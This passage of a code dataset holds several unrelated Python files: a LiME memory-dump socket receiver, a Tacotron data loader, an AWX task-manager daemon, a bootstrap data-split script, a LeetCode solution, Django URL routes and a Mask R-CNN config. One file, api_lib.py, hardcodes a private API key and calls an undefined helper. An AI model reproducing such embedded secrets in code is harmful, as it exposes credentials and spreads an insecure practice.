socket.SOCK_STREAM)\n s.connect((ip, LIME_PORT))\n except Exception as e:\n es = ElasticUtil()\n es.log_error(\"DumpReceive ConnectError: \" + e.message)\n while True:\n mem_data = s.recv(1024)\n if not mem_data:\n break\n out.write(mem_data)\n\n es = ElasticUtil()\n es.log(\"Successfully dumped memory to \" + output_path)\n\n except Exception as e:\n es = ElasticUtil()\n es.log_error(\"DumpReceive CreateError: \" + e.message)\n\n\n\n\n","sub_path":"GYMIC-Server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154086442","text":"import numpy as np\nimport torch\nimport torch.utils.data\nimport os\n\nimport layers\nfrom utils import load_wav_to_torch, load_filepaths_and_text\n# for individual & batch level permuting\nfrom utils import permute_filelist, permute_batch_from_filelist\n# for pre-batching\nfrom utils import batching, get_batch_sizes, permute_batch_from_batch\nfrom text import text_to_sequence\n\n\nclass TextMelLoader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) normalizes text and converts them to sequences of one-hot vectors\n 3) computes mel-spectrograms from audio files.\n \"\"\"\n def __init__(self, audiopaths_and_text, shuffle_plan, hparams, epoch=0,\n speaker_ids=None, emotion_ids=None):\n self.audiopaths_and_text = load_filepaths_and_text(audiopaths_and_text)\n self.shuffle_audiopaths = shuffle_plan['shuffle-audiopath']\n self.shuffle_batches = shuffle_plan['shuffle-batch']\n 
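A note on recv_dump in the GYMIC-Server record above: it uses the standard receive-until-EOF socket pattern, but after a failed connect it only logs and then falls through to s.recv(), and e.message is Python-2 only. A minimal sketch of the same pattern with those two issues avoided; host, port, and the output path are placeholders:

```python
import socket

def recv_to_file(host, port, out_path, chunk=1024):
    # Return early on a failed connect instead of falling through to recv().
    try:
        sock = socket.create_connection((host, port))
    except OSError as exc:
        print("connect failed: %s" % exc)
        return
    with sock, open(out_path, "wb") as out:
        while True:
            data = sock.recv(chunk)
            if not data:  # empty bytes: the peer closed the connection
                break
            out.write(data)
```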
self.permute_opt = shuffle_plan['permute-opt']\n self.pre_batching = shuffle_plan['pre-batching']\n self.prep_trainset_per_epoch = hparams.prep_trainset_per_epoch\n self.filelist_cols = hparams.filelist_cols\n self.local_rand_factor = hparams.local_rand_factor\n self.include_emo_emb = hparams.include_emo_emb\n self.emo_emb_dim = hparams.emo_emb_dim\n self.text_cleaners = hparams.text_cleaners\n self.max_wav_value = hparams.max_wav_value\n self.sampling_rate = hparams.sampling_rate\n self.load_mel_from_disk = hparams.load_mel_from_disk\n self.n_speakers = hparams.n_speakers\n self.n_emotions = hparams.n_emotions\n self.label_type = hparams.label_type\n self.use_vae = hparams.use_vae\n\n if hparams.override_sample_size:\n self.hop_length = int(np.ceil(hparams.hop_time/1000*hparams.sampling_rate))\n self.win_length = int(np.ceil(hparams.win_time/1000*hparams.sampling_rate))\n self.filter_length = int(2**np.ceil(np.log2(self.win_length)))\n else:\n self.hop_length = hparams.hop_length\n self.win_length = hparams.win_length\n self.filter_length = hparams.filter_length\n self.stft = layers.TacotronSTFT(\n self.filter_length, self.hop_length, self.win_length,\n hparams.n_mel_channels, hparams.sampling_rate, hparams.mel_fmin,\n hparams.mel_fmax)\n\n audiopaths_and_text_ori = self.audiopaths_and_text[:]\n if self.prep_trainset_per_epoch:\n seed = hparams.seed + epoch\n else:\n seed = hparams.seed\n if self.shuffle_audiopaths:\n self.audiopaths_and_text = permute_filelist(self.audiopaths_and_text,\n self.filelist_cols, seed, self.permute_opt, self.local_rand_factor)[0]\n if self.pre_batching:\n batch_sizes = get_batch_sizes(self.audiopaths_and_text,\n hparams.filelist_cols, hparams.batch_size)\n assert sum(batch_sizes) == len(self.audiopaths_and_text),\\\n \"check: not all samples get batched in pre-batching!\"\n self.audiopaths_and_text = batching(self.audiopaths_and_text, batch_sizes)\n if self.shuffle_batches:\n if self.pre_batching:\n self.audiopaths_and_text = permute_batch_from_batch(\n self.audiopaths_and_text, seed)\n else:\n self.audiopaths_and_text = permute_batch_from_filelist(\n self.audiopaths_and_text, hparams.batch_size, seed)\n\n self.speaker_ids = speaker_ids\n if not self.speaker_ids:\n self.speaker_ids = self.create_lookup(audiopaths_and_text_ori, 'speaker')\n\n self.emotion_ids = emotion_ids\n if not self.emotion_ids:\n self.emotion_ids = self.create_lookup(audiopaths_and_text_ori, 'emotion')\n\n def parse_filelist_line(self, audiopath_and_text):\n # parse basic cols\n audiopath = audiopath_and_text[self.filelist_cols.index('audiopath')]\n text = audiopath_and_text[self.filelist_cols.index('text')]\n # parse optional cols\n emoembpath, dur, speaker, emotion = '', '', '', ''\n if 'emoembpath' in self.filelist_cols:\n emoembpath = audiopath_and_text[self.filelist_cols.index('emoembpath')]\n if 'dur' in self.filelist_cols:\n dur = float(audiopath_and_text[self.filelist_cols.index('dur')])\n if 'speaker' in self.filelist_cols:\n speaker = audiopath_and_text[self.filelist_cols.index('speaker')]\n if 'emotion' in self.filelist_cols:\n emotion = audiopath_and_text[self.filelist_cols.index('emotion')]\n return audiopath, emoembpath, text, dur, speaker, emotion\n\n def get_mel_text_pair(self, audiopath_and_text):\n # separate filename and text\n emoemb, speaker, emotion = '', '', ''\n audiopath, emoembpath, text, dur, speaker, emotion = \\\n self.parse_filelist_line(audiopath_and_text)\n text = self.get_text(text) # int_tensor[char_index, ....]\n mel = self.get_mel(audiopath) # []\n if 
self.use_vae:\n if self.include_emo_emb:\n emoemb = self.get_emoemb(emoembpath)\n speaker = self.get_speaker(speaker, self.label_type)\n emotion = self.get_emotion(emotion, self.label_type)\n audioid = os.path.splitext(os.path.basename(audiopath))[0]\n return (text, mel, emoemb, speaker, emotion, dur, audioid)\n\n def get_mel(self, filename):\n if not self.load_mel_from_disk:\n audio, sampling_rate = load_wav_to_torch(filename)\n if sampling_rate != self.stft.sampling_rate:\n raise ValueError(\"{} SR doesn't match target {} SR\".format(\n sampling_rate, self.stft.sampling_rate))\n audio_norm = audio / self.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = self.stft.mel_spectrogram(audio_norm) # 1 X n_mel_channels X n_frames\n melspec = torch.squeeze(melspec, 0) # n_mel_channels X n_frames\n else:\n melspec = torch.from_numpy(np.load(filename))\n assert melspec.size(0) == self.stft.n_mel_channels, (\n 'Mel dimension mismatch: given {}, expected {}'.format(\n melspec.size(0), self.stft.n_mel_channels))\n\n return melspec\n\n def get_emoemb(self, filename):\n emoemb = torch.from_numpy(np.load(filename)).T\n assert emoemb.size(0) == self.emo_emb_dim, (\n 'Emotion embedding dimension mismatch: given {}, expected {}'.format(\n emoemb.size(0), self.emo_emb_dim))\n return emoemb\n\n def get_text(self, text):\n text_norm = torch.IntTensor(text_to_sequence(text, self.text_cleaners))\n return text_norm\n\n def create_lookup(self, audiopaths_and_text, attribute):\n a2i = {'speaker':-2, 'emotion':-1}\n ids = sorted(set(x[a2i[attribute]] for x in audiopaths_and_text))\n d = {ids[i]: i for i in range(len(ids))}\n return d\n\n def get_speaker(self, speaker, label_type='one-hot'):\n if label_type == 'one-hot':\n speaker_vector = np.zeros(self.n_speakers)\n speaker_vector[self.speaker_ids[speaker]] = 1\n output = torch.Tensor(speaker_vector.astype(dtype=np.float32))\n elif label_type == 'id':\n output = torch.tensor([self.speaker_ids[speaker]])\n return output\n\n def get_emotion(self, emotion, label_type='one-hot'):\n if label_type == 'one-hot':\n emotion_vector = np.zeros(self.n_emotions)\n emotion_vector[self.emotion_ids[emotion]] = 1\n output = torch.Tensor(emotion_vector.astype(dtype=np.float32))\n elif label_type == 'id':\n output = torch.tensor([self.emotion_ids[emotion]])\n return output\n\n def __getitem__(self, index):\n if self.pre_batching:\n audiopaths_and_text = self.audiopaths_and_text[index]\n pairs = [self.get_mel_text_pair(audiopath_and_text) for\n audiopath_and_text in audiopaths_and_text]\n else:\n pairs = self.get_mel_text_pair(self.audiopaths_and_text[index])\n return pairs\n\n def __len__(self):\n return len(self.audiopaths_and_text)\n\n\nclass TextMelCollate():\n \"\"\" Zero-pads model inputs and targets based on number of frames per step\n \"\"\"\n def __init__(self, hparams, pre_batching=False):\n self.pre_batching = pre_batching\n self.n_frames_per_step = hparams.n_frames_per_step\n self.label_type = hparams.label_type\n self.use_vae = hparams.use_vae\n\n def __call__(self, batch):\n \"\"\"Collate's training batch from normalized text and mel-spectrogram\n PARAMS\n ------\n batch: [[text_normalized, mel_normalized], ...]\n e.g.\n import itertools\n batch = list(itertools.islice(train_loader.dataset, hparams.batch_size))\n \"\"\"\n\n if self.pre_batching:\n batch = batch[0]\n\n # Right zero-pad all one-hot text sequences to max input length\n input_lengths, ids_sorted_decreasing = torch.sort(\n 
torch.LongTensor([len(x[0]) for x in batch]),\n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(batch), max_input_len)\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = batch[ids_sorted_decreasing[i]][0]\n text_padded[i, :text.size(0)] = text\n\n if self.use_vae:\n if self.label_type == 'one-hot':\n speakers = torch.LongTensor(len(batch), len(batch[0][3]))\n for i in range(len(ids_sorted_decreasing)):\n speaker = batch[ids_sorted_decreasing[i]][3]\n speakers[i, :] = speaker\n emotions = torch.LongTensor(len(batch), len(batch[0][4]))\n for i in range(len(ids_sorted_decreasing)):\n emotion = batch[ids_sorted_decreasing[i]][4]\n emotions[i, :] = emotion\n elif self.label_type == 'id':\n speakers = torch.LongTensor(len(batch))\n emotions = torch.LongTensor(len(batch))\n for i in range(len(ids_sorted_decreasing)):\n speakers[i] = batch[ids_sorted_decreasing[i]][3]\n emotions[i] = batch[ids_sorted_decreasing[i]][4]\n else:\n speakers = emotions = ''\n\n durs = [[] for _ in range(len(batch))]\n audioids = [[] for _ in range(len(batch))]\n for i in range(len(ids_sorted_decreasing)):\n durs[i] = batch[ids_sorted_decreasing[i]][5]\n audioids[i] = batch[ids_sorted_decreasing[i]][6]\n\n # Right zero-pad mel-spec\n num_mels = batch[0][1].size(0)\n max_target_len1 = max([x[1].size(1) for x in batch])\n\n if len(batch[0][2]) > 0:\n num_emoembs = batch[0][2].size(0)\n max_target_len2 = max([x[2].size(1) for x in batch])\n\n max_target_len = max_target_len1\n # todo: uniform wintime/hoptime of mel and emoemb so max_target_len will be the same\n\n # increment max_target_len to the multiples of n_frames_per_step\n if max_target_len % self.n_frames_per_step != 0:\n max_target_len += self.n_frames_per_step - max_target_len % self.n_frames_per_step\n assert max_target_len % self.n_frames_per_step == 0\n # todo: to support n_frames_per_step > 1\n\n # include mel padded and gate padded\n mel_padded = torch.FloatTensor(len(batch), num_mels, max_target_len)\n mel_padded.zero_()\n gate_padded = torch.FloatTensor(len(batch), max_target_len)\n gate_padded.zero_()\n output_lengths = torch.LongTensor(len(batch))\n for i in range(len(ids_sorted_decreasing)):\n mel = batch[ids_sorted_decreasing[i]][1]\n mel_padded[i, :, :mel.size(1)] = mel\n gate_padded[i, mel.size(1)-1:] = 1\n output_lengths[i] = mel.size(1)\n\n if len(batch[0][2]) > 0:\n emoemb_padded = torch.FloatTensor(len(batch), num_emoembs, max_target_len)\n emoemb_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n emoemb = batch[ids_sorted_decreasing[i]][2]\n emoemb_nframes = min(emoemb.size(1), max_target_len)\n emoemb_padded[i, :, :emoemb_nframes] = emoemb[:, :emoemb_nframes]\n else:\n emoemb_padded = ''\n\n return text_padded, input_lengths, mel_padded, emoemb_padded, \\\n gate_padded, output_lengths, speakers, emotions, durs, audioids\n","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"35598075","text":"# Embedded file name: /usr/lib/python2.6/site-packages/awx/main/management/commands/run_task_system.py\nimport os\nimport datetime\nimport logging\nimport signal\nimport time\nfrom django.conf import settings\nfrom django.core.management.base import NoArgsCommand\nfrom awx.main.models import *\nfrom awx.main.queue import FifoQueue\nfrom awx.main.tasks import handle_work_error\nfrom awx.main.utils import 
get_system_task_capacity\nfrom celery.task.control import inspect\nlogger = logging.getLogger('awx.main.commands.run_task_system')\nqueue = FifoQueue('tower_task_manager')\n\nclass SimpleDAG(object):\n \"\"\" A simple implementation of a directed acyclic graph \"\"\"\n\n def __init__(self):\n self.nodes = []\n self.edges = []\n\n def __contains__(self, obj):\n for node in self.nodes:\n if node['node_object'] == obj:\n return True\n\n return False\n\n def __len__(self):\n return len(self.nodes)\n\n def __iter__(self):\n return self.nodes.__iter__()\n\n def generate_graphviz_plot(self):\n\n def short_string_obj(obj):\n if type(obj) == Job:\n type_str = 'Job'\n if type(obj) == AdHocCommand:\n type_str = 'AdHocCommand'\n elif type(obj) == InventoryUpdate:\n type_str = 'Inventory'\n elif type(obj) == ProjectUpdate:\n type_str = 'Project'\n else:\n type_str = 'Unknown'\n type_str += '%s' % str(obj.id)\n return type_str\n\n doc = '\\n digraph g {\\n rankdir = LR\\n '\n for n in self.nodes:\n doc += '%s [color = %s]\\n' % (short_string_obj(n['node_object']), 'red' if n['node_object'].status == 'running' else 'black')\n\n for from_node, to_node in self.edges:\n doc += '%s -> %s;\\n' % (short_string_obj(self.nodes[from_node]['node_object']), short_string_obj(self.nodes[to_node]['node_object']))\n\n doc += '}\\n'\n gv_file = open('/tmp/graph.gv', 'w')\n gv_file.write(doc)\n gv_file.close()\n\n def add_node(self, obj, metadata = None):\n if self.find_ord(obj) is None:\n self.nodes.append(dict(node_object=obj, metadata=metadata))\n return\n\n def add_edge(self, from_obj, to_obj):\n from_obj_ord = self.find_ord(from_obj)\n to_obj_ord = self.find_ord(to_obj)\n if from_obj_ord is None or to_obj_ord is None:\n raise LookupError('Object not found')\n self.edges.append((from_obj_ord, to_obj_ord))\n return\n\n def add_edges(self, edgelist):\n for edge_pair in edgelist:\n self.add_edge(edge_pair[0], edge_pair[1])\n\n def find_ord(self, obj):\n for idx in range(len(self.nodes)):\n if obj == self.nodes[idx]['node_object']:\n return idx\n\n return None\n\n def get_node_type(self, obj):\n if type(obj) == Job:\n return 'job'\n if type(obj) == AdHocCommand:\n return 'ad_hoc_command'\n if type(obj) == InventoryUpdate:\n return 'inventory_update'\n if type(obj) == ProjectUpdate:\n return 'project_update'\n return 'unknown'\n\n def get_dependencies(self, obj):\n antecedents = []\n this_ord = self.find_ord(obj)\n for node, dep in self.edges:\n if node == this_ord:\n antecedents.append(self.nodes[dep])\n\n return antecedents\n\n def get_dependents(self, obj):\n decendents = []\n this_ord = self.find_ord(obj)\n for node, dep in self.edges:\n if dep == this_ord:\n decendents.append(self.nodes[node])\n\n return decendents\n\n def get_leaf_nodes(self):\n leafs = []\n for n in self.nodes:\n if len(self.get_dependencies(n['node_object'])) < 1:\n leafs.append(n)\n\n return leafs\n\n\ndef get_tasks():\n \"\"\"Fetch all Tower tasks that are relevant to the task management\n system.\n \"\"\"\n RELEVANT_JOBS = ('pending', 'waiting', 'running')\n graph_jobs = [ j for j in Job.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_ad_hoc_commands = [ ahc for ahc in AdHocCommand.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_inventory_updates = [ iu for iu in InventoryUpdate.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_project_updates = [ pu for pu in ProjectUpdate.objects.filter(status__in=RELEVANT_JOBS) ]\n graph_system_jobs = [ sj for sj in SystemJob.objects.filter(status__in=RELEVANT_JOBS) ]\n all_actions = sorted(graph_jobs 
+ graph_ad_hoc_commands + graph_inventory_updates + graph_project_updates + graph_system_jobs, key=lambda task: task.created)\n return all_actions\n\n\ndef rebuild_graph(message):\n \"\"\"Regenerate the task graph by refreshing known tasks from Tower, purging\n orphaned running tasks, and creating dependencies for new tasks before\n generating directed edge relationships between those tasks.\n \"\"\"\n if Instance.objects.my_role() == 'secondary':\n return\n else:\n inspector = inspect()\n if not hasattr(settings, 'IGNORE_CELERY_INSPECTOR'):\n active_task_queues = inspector.active()\n else:\n logger.warn('Ignoring celery task inspector')\n active_task_queues = None\n all_sorted_tasks = get_tasks()\n if not len(all_sorted_tasks):\n return\n active_tasks = []\n if active_task_queues is not None:\n for queue in active_task_queues:\n active_tasks += [ at['id'] for at in active_task_queues[queue] ]\n\n else:\n logger.error('Could not communicate with celery!')\n if not hasattr(settings, 'CELERY_UNIT_TEST'):\n return\n running_tasks = filter(lambda t: t.status == 'running', all_sorted_tasks)\n waiting_tasks = filter(lambda t: t.status != 'running', all_sorted_tasks)\n new_tasks = filter(lambda t: t.status == 'pending', all_sorted_tasks)\n logger.debug('Active celery tasks: ' + str(active_tasks))\n for task in list(running_tasks):\n if task.celery_task_id not in active_tasks and not hasattr(settings, 'IGNORE_CELERY_INSPECTOR'):\n task.status = 'failed'\n task.job_explanation += ' '.join(('Task was marked as running in Tower but was not present in', 'Celery, so it has been marked as failed.'))\n task.save()\n task.socketio_emit_status('failed')\n running_tasks.pop(running_tasks.index(task))\n logger.error('Task %s appears orphaned... marking as failed' % task)\n\n for task in new_tasks:\n logger.debug('Checking dependencies for: %s' % str(task))\n task_dependencies = task.generate_dependencies(running_tasks + waiting_tasks)\n logger.debug('New dependencies: %s' % str(task_dependencies))\n for dep in task_dependencies:\n time_delt = len(task_dependencies) - task_dependencies.index(dep)\n dep.created = task.created - datetime.timedelta(seconds=1 + time_delt)\n dep.status = 'waiting'\n dep.save()\n waiting_tasks.insert(waiting_tasks.index(task), dep)\n\n if not hasattr(settings, 'UNIT_TEST_IGNORE_TASK_WAIT'):\n task.status = 'waiting'\n task.save()\n\n graph = SimpleDAG()\n for task in running_tasks:\n graph.add_node(task)\n\n for wait_task in waiting_tasks[:50]:\n node_dependencies = []\n for node in graph:\n if wait_task.is_blocked_by(node['node_object']):\n node_dependencies.append(node['node_object'])\n\n graph.add_node(wait_task)\n for dependency in node_dependencies:\n graph.add_edge(wait_task, dependency)\n\n if settings.DEBUG:\n graph.generate_graphviz_plot()\n return graph\n\n\ndef process_graph(graph, task_capacity):\n \"\"\"Given a task dependency graph, start and manage tasks given their\n priority and weight.\n \"\"\"\n leaf_nodes = graph.get_leaf_nodes()\n running_nodes = filter(lambda x: x['node_object'].status == 'running', leaf_nodes)\n running_impact = sum([ t['node_object'].task_impact for t in running_nodes ])\n ready_nodes = filter(lambda x: x['node_object'].status != 'running', leaf_nodes)\n remaining_volume = task_capacity - running_impact\n logger.info('Running Nodes: %s; Capacity: %s; Running Impact: %s; Remaining Capacity: %s' % (str(running_nodes),\n str(task_capacity),\n str(running_impact),\n str(remaining_volume)))\n logger.info('Ready Nodes: %s' % str(ready_nodes))\n 
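A condensed sketch of the SimpleDAG bookkeeping used above (class and method names here are illustrative): nodes live in a list, edges are stored as (from_index, to_index) pairs, and the "leaf" nodes that process_graph schedules are exactly the tasks with no outgoing dependency edges, i.e. tasks that nothing blocks.

```python
class MiniDAG:
    def __init__(self):
        self.nodes, self.edges = [], []

    def add_node(self, obj):
        self.nodes.append(obj)

    def add_edge(self, from_obj, to_obj):
        # Edges point from a task to the task it depends on.
        self.edges.append((self.nodes.index(from_obj), self.nodes.index(to_obj)))

    def leaf_nodes(self):
        # A node with any outgoing edge still has unmet dependencies.
        blocked = {frm for frm, _ in self.edges}
        return [n for i, n in enumerate(self.nodes) if i not in blocked]

dag = MiniDAG()
dag.add_node("job_42")
dag.add_node("project_update_7")
dag.add_edge("job_42", "project_update_7")  # the job waits on the update
print(dag.leaf_nodes())  # ['project_update_7'] is runnable first
```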
for task_node in ready_nodes:\n node_obj = task_node['node_object']\n impact = node_obj.task_impact\n if impact <= remaining_volume or running_impact == 0:\n node_dependencies = graph.get_dependents(node_obj)\n if graph.get_node_type(node_obj) == 'job':\n node_dependencies = []\n dependent_nodes = [{'type': graph.get_node_type(node_obj),\n 'id': node_obj.id}] + [ {'type': graph.get_node_type(n['node_object']),\n 'id': n['node_object'].id} for n in node_dependencies ]\n error_handler = handle_work_error.s(subtasks=dependent_nodes)\n start_status = node_obj.start(error_callback=error_handler)\n if not start_status:\n node_obj.status = 'failed'\n if node_obj.job_explanation:\n node_obj.job_explanation += ' '\n node_obj.job_explanation += 'Task failed pre-start check.'\n node_obj.save()\n continue\n remaining_volume -= impact\n running_impact += impact\n logger.info('Started Node: %s (capacity hit: %s) Remaining Capacity: %s' % (str(node_obj), str(impact), str(remaining_volume)))\n\n\ndef run_taskmanager():\n \"\"\"Receive task start and finish signals to rebuild a dependency graph\n and manage the actual running of tasks.\n \"\"\"\n\n def shutdown_handler():\n\n def _handler(signum, frame):\n signal.signal(signum, signal.SIG_DFL)\n os.kill(os.getpid(), signum)\n\n return _handler\n\n signal.signal(signal.SIGINT, shutdown_handler())\n signal.signal(signal.SIGTERM, shutdown_handler())\n paused = False\n task_capacity = get_system_task_capacity()\n last_rebuild = datetime.datetime.fromtimestamp(0)\n while True:\n message = queue.pop()\n if (datetime.datetime.now() - last_rebuild).seconds > 10:\n if message is not None and 'pause' in message:\n logger.info('Pause command received: %s' % str(message))\n paused = message['pause']\n graph = rebuild_graph(message)\n if not paused and graph is not None:\n process_graph(graph, task_capacity)\n last_rebuild = datetime.datetime.now()\n time.sleep(0.1)\n\n return\n\n\nclass Command(NoArgsCommand):\n \"\"\"Tower Task Management System\n This daemon is designed to reside between our tasks and celery and\n provide a mechanism for understanding the relationship between those tasks\n and their dependencies.\n \n It also actively prevents situations in which Tower can get blocked\n because it doesn't have an understanding of what is progressing through\n celery.\n \"\"\"\n help = 'Launch the Tower task management system'\n\n def handle_noargs(self, **options):\n try:\n run_taskmanager()\n except KeyboardInterrupt:\n pass","sub_path":"usr/lib/python2.6/site-packages/awx/main/management/commands/run_task_system.py","file_name":"run_task_system.py","file_ext":"py","file_size_in_byte":11610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28088637","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport os\n\nos.chdir(\"/home/seugurlu/Desktop/SVN/trunk/estimering\") #Personal Comp - Virtual Comp Directory\n\n#Read the dataset and set hyperparameters\nmain_sample = pd.read_csv('data/raw/estimation_data.txt')\nmain_sample.rename(columns = {'Unnamed: 0' : 'hhid'}, inplace = True)\nmain_sample.to_hdf('./data/processed/main_sample', 'main_sample')\nnumber_hh = main_sample.shape[0]\nnumber_goods = len(main_sample.filter(regex = \"^p\").columns)\nnumber_bootstrap = 1000\n\n\"\"\"Generate Training/CV/Test Samples for bootstrap\"\"\"\nfor i in range(number_bootstrap):\n bootstrap_sample = main_sample.sample(frac = 1, replace = True, random_state = i)\n x_ = 
bootstrap_sample.iloc[:,1:number_goods+2].astype(np.float32)\n y_ = bootstrap_sample.iloc[:,number_goods+2:2*number_goods+2].astype(np.float32)\n x_train, x_test, y_train, y_test = train_test_split(x_, y_, test_size=0.30, random_state=(i+1)*number_bootstrap)\n x_cv, x_test, y_cv, y_test = train_test_split(x_test, y_test, test_size = 0.5, random_state = (i+1)*number_bootstrap + 1)\n save_name = 'bootstrap_sample'+str(i+1)\n bootstrap_sample.to_hdf('data/processed/'+save_name,'bootstrap_sample')\n x_.to_hdf('data/processed/'+save_name,'x_')\n y_.to_hdf('data/processed/'+save_name,'y_')\n x_train.to_hdf('data/processed/'+save_name,'x_train')\n y_train.to_hdf('data/processed/'+save_name,'y_train')\n x_cv.to_hdf('data/processed/'+save_name,'x_cv')\n y_cv.to_hdf('data/processed/'+save_name,'y_cv')\n x_test.to_hdf('data/processed/'+save_name,'x_test')\n y_test.to_hdf('data/processed/'+save_name,'y_test')","sub_path":"pycodes/data_design.py","file_name":"data_design.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345331113","text":"\"\"\"\nleetcode 2021 March Challenge\nhttps://leetcode.com/explore/challenge/card/march-leetcoding-challenge-2021/591/week-4-march-22nd-march-28th/3687/\n\"\"\"\nfrom collections import defaultdict\n\nclass Solution:\n def originalDigits(self, s: str) -> str:\n answer = []\n # frequency map of character\n fmap = defaultdict(int)\n for c in s:\n fmap[c] += 1\n # more unique number would be checked first\n numbers = {\n \"0\" : \"zero\",\n \"6\" : \"six\",\n \"8\" : \"eight\",\n \"4\" : \"four\",\n \"7\" : \"seven\",\n \"2\" : \"two\",\n \"3\" : \"three\",\n \"1\" : \"one\",\n \"5\" : \"five\",\n \"9\" : \"nine\",\n }\n for nbr, alpha_nbr in numbers.items():\n # max frequency is 50000. 
because len(s) is up to 50000\n frequency = 50001\n for c in alpha_nbr:\n if c not in fmap or fmap[c] < 1:\n break\n frequency = min(frequency, s.count(c), fmap[c])\n else:\n answer.extend(nbr * frequency)\n for c in alpha_nbr:\n fmap[c] -= frequency\n return ''.join(sorted(answer))\n\nS = Solution()\nprint(S.originalDigits(\"owoztneoer\"))\nprint(S.originalDigits(\"fviefuro\"))\nprint(S.originalDigits(\"zeroonetwothreefourfivesixseveneightnine\"))","sub_path":"2021.03.28.py","file_name":"2021.03.28.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"650982907","text":"import base64\nimport bcrypt\nimport requests\nimport json\nimport random\nfrom applib.lib.helper import get_config\n\npublic_key='j6kHi1NXAOjrHFk0'\nprivate_key=\"XY1t9Y159hWJaETD\"\n\n\ndef hash_data(checksum):\n\tchecksum = checksum.encode(\"utf-8\")\n\tvalue = bcrypt.hashpw(checksum, bcrypt.gensalt())\n\n\tencodedBytes = base64.b64encode(value)\n\tencodedStr = str(encodedBytes, \"utf-8\")\n\treturn encodedStr\n\n\n\ndef merchant_details(login_id):\n\tchecksum = str(login_id) + \"|\" + private_key\n\tchecksum_data = hash_data(checksum)\n\n\turl = get_config('SERVICES', 'merchant')\n\n\tpayload = {'loginId': login_id, 'key': public_key, \n\t\t\t\t'checksum': checksum_data} \n\n\trh = RequestHandler(url, method=1, data=payload)\n\tretv = rh.send()\n\treturn retv \n\n\n\ndef requery_transaction(login_id, public_key, service_id):\n\trequest_id = random.randrange(10000000, 99999999)\n\n\turl = get_config('SERVICES', 'requery')\n\n\tpayload = {'loginId': login_id, 'key': public_key, 'requestId': request_id, \n\t\t\t\t'serviceId': service_id}\n\n\trh = RequestHandler(url, method=1, data=payload)\n\tretv = rh.send()\n\treturn retv\n\n\n\n ","sub_path":"api_services/api_lib.py","file_name":"api_lib.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"558843727","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.conf.urls import patterns\r\n\r\nurlpatterns = patterns('get_capacity.views',\r\n (r'^$', 'home'),\r\n # 表单下拉数据获取及渲染\r\n (r'^get_app/$', 'get_app'),\r\n (r'^get_ip_by_appid/$', 'get_ip_by_appid'),\r\n (r'^get_task_list/$', 'get_task_id_by_appid'),\r\n\r\n # 执行作业,获取容量数据\r\n (r'^execute_job/$', 'execute_job'),\r\n (r'^get_capacity/$', 'get_capacity'),\r\n)\r\n","sub_path":"get_capacity/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"174124831","text":"import os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy.io\n\nfrom config import Config\nimport utils\nimport model as modellib\nimport visualize\nfrom model import log\n\n#%matplotlib inline\n\n# Root directory of the project\nROOT_DIR = os.getcwd()\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs.nosync\")\n\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5.nosync\")\n\nclass ShapesConfig(Config):\n \"\"\"Configuration for training on the toy shapes dataset.\n Derives from the base Config class and overrides values specific\n to the toy shapes dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"layout\"\n\n # Train on 2 GPU and 4 images per GPU. 
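The originalDigits record above works because its fixed ordering checks the more uniquely spelled digit words first. A common closed-form alternative, sketched below, exploits the fact that some letters occur in exactly one digit word ('z' only in "zero", 'w' in "two", 'u' in "four", 'x' in "six", 'g' in "eight"), so every count falls out by direct subtraction:

```python
from collections import Counter

def original_digits(s: str) -> str:
    c = Counter(s)
    n = [0] * 10
    n[0] = c['z']                       # zero
    n[2] = c['w']                       # two
    n[4] = c['u']                       # four
    n[6] = c['x']                       # six
    n[8] = c['g']                       # eight
    n[3] = c['h'] - n[8]                # 'h' also appears in eight
    n[5] = c['f'] - n[4]                # 'f' also appears in four
    n[7] = c['s'] - n[6]                # 's' also appears in six
    n[1] = c['o'] - n[0] - n[2] - n[4]  # 'o' also in zero/two/four
    n[9] = c['i'] - n[5] - n[6] - n[8]  # 'i' also in five/six/eight
    return ''.join(str(d) * n[d] for d in range(10))

assert original_digits("owoztneoer") == "012"
assert original_digits("fviefuro") == "45"
```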
